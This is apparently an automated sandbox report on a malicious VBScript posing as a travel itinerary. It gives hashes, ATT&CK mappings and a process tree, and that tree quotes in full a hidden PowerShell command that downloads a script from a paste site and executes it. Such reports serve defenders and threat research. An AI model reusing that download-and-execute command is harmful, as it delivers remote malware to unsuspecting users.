dac02b322f310cdaa789470be4bbf41fa842781a8010c06aaa346f1e87f96b72

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21/01/2025, 21:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RoundTripItinerarydetails.vbs
Size

780B
MD5

44a1dc576cca328a09abc1747cfc6984
SHA1

30edd4c5e409ed9702b2ae4a5d16c07dde4e873c
SHA256

dac02b322f310cdaa789470be4bbf41fa842781a8010c06aaa346f1e87f96b72
SHA512

af3d479790b667aeb268c5304f2490c8d17c669de48ecb5222c9c6c900f3c289417878af5fd5faca16bb543ae5097ae2073f10d5ea80138ff82aaa246b23e534

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2316	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe
2616	powershell.exe
2968	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2968	powershell.exe
2616	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2316 wrote to memory of 2968	2316	WScript.exe	30
PID 2316 wrote to memory of 2968	2316	WScript.exe	30
PID 2316 wrote to memory of 2968	2316	WScript.exe	30
PID 2968 wrote to memory of 2616	2968	powershell.exe	32
PID 2968 wrote to memory of 2616	2968	powershell.exe	32
PID 2968 wrote to memory of 2616	2968	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RoundTripItinerarydetails.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command Invoke-WebRequest -Uri 'https://www.pastery.net/qjaxzf/raw/' -OutFile 'C:\Users\Public\WindowsLocalSystem.PS1'; PowerShell -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File 'C:\Users\Public\WindowsLocalSystem.PS1'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Public\WindowsLocalSystem.PS1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ca657a3c6073b9a33ba53b057b181616

SHA1
ca91e9cedfcfff6f9d7c82c7ea2ab7c1f998df6a

SHA256
9c7019ab0330ddcad0b6899a7a57d5b203fa1f99b3ed4d9b3e8cd6a6dc9d04f6

SHA512
7db131cdae63ccb5e8051dc30b45ff01ac53053574cbc0a6e6d4a43d793d253bb3514c6f5d43d01f1f0a193c5794cc353e732e9c30f283bd4fe486a80f9e5f21

Download Submit
memory/2968-4-0x000007FEF510E000-0x000007FEF510F000-memory.dmp

Filesize
4KB

Download
memory/2968-5-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2968-6-0x0000000002070000-0x0000000002078000-memory.dmp

Filesize
32KB

Download
memory/2968-7-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2968-13-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2968-14-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2968-15-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2968-16-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download